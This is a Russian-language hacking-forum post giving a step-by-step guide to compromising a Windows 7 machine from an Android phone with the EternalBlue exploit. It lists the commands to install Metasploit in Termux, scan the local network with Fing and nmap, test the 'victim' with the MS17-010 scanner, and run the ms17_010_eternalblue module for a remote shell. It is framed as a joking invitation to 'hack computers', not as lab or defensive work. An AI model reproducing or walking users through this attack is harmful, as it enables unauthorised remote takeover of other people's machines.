Как похекать компухтер с андроида без root(eternalblue)

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
Всё что нам для этого понадобится:
  • Прямые руки
  • Телефон на андроиде
  • Fing
  • nmap
  • temux и
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    или kali nethunter
1)
Для начала скачаем
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Теперь установим metasploit:

[SRC]
apt update
apt upgrade
apt install curl
curl -LO
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

cd metasploit-framework-4.14.28
./msfconsole
[/SRC]

Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди

После всего у нас должен открыться metasploit
b8adff55b9af94ef2e1c171463fb0439.png

После того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.

2)
Сканирование сети c Fing
Теперь посмотрим кто есть в нашей сети:
Для этого удобно использовать утилиту
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
(<=кликабельно)
Вот так выглядит моя локальная сеть(у всех по разному):
c26d8474b40369b3796fb9177ff576f0.jpg

И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.

3)
Сканирование на открытые порты c nmap
Установим этот чудесный инструмент:
[SRC]

apt-get update
apt-get install nmap
[/SRC]

ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
nmap ip жертвы
В моём случае это:
[SRC]

nmap 192.168.1.104
[/SRC]

Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
Вот что мы видим:
4409bc75ae78a7b9871197fb854090e9.jpg

У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
.

4)
Проверка уязвимости
Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
.(Мне так просто реально удобнее)
Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
в metasploit вводите:
use auxiliary/scanner/smb/smb_ms17_010
Здесь нам нужно указать только ip адрес жертвы
Выглядит это так:
set RHOSTS ip жертвы
В моём случае это:
set RHOSTS 192.168.1.104
Запускаем скан командой
run
5b3a734b015c4cde02012c26c3910ba5.jpg

Если мы видим что-то подобное значит хост уязвим к эксплоиту

5)
Теперь завершающая стадия:использование эксплоита
В том же metasploit пишем
use exploit/windows/smb/ms17_010_eternalblue
Здесь нам нужно указать ip жертвы и процесс
Ip жертвы:
Выглядит это так:
set RHOST ip жертвы
В моём случае это:
set RHOST 192.168.1.104
И процесс
set ProcessName explorer.exe
5a10697b9242ff24c9b27476ca63f1a1.jpg
И после того как вы помолились и поставили икону на обои можно запускать эксплоит
exploit
Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.
4a9653205d2f4d758df6beb59ab2dc3f.jpg
4d3babb8c0818cb7559e1dc2627ebca9.jpg
5ba48bae2936e54b585e6f664cfe0aa7.jpg
Всем спасибо за внимание!Удачно вам похекать компы!
 
  • Лайк
Reactions: BadZ

BadZ

VIP

BadZ

VIP
18 Мар 2017
155
72
Раньше этот эксплоит (eternalblue когда попал в паблик) работал только на вин7 х64, сейчас все также или уже все в подряд ломает?
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя